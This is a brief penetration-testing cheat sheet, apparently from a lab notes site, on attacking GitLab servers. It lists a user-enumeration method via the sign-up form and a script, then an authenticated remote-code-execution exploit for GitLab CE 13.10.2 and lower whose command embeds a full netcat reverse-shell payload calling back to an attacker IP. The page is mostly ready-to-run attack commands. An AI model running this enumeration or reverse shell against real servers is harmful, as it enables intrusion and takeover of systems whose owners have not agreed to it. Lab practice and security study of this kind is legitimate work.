user

Gitlab username enum

GitLabUserEnum.py

Manually

We may use registration form to enumerate valid users.
/users/sign_up
Read this post to understand more about it.

Automatic

./gitlab_userenum.sh --url http://gitlab.inlanefreight.local:8081/ --userlist users.txt

Authenticated remote code

Hackerone Report - affected version "GitLab community edition version 13.10.2 and lower"

Exploit

python3 gitlab_13_10_2_rce.py -t http://gitlab.inlanefreight.local:8081 -u mrb3n -p password1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 8443 >/tmp/f '

Know vulnerabilities

gitlab_userenum.sh - affected version 13.10.3

Previousenumeration Nextversion

Last updated 1 day ago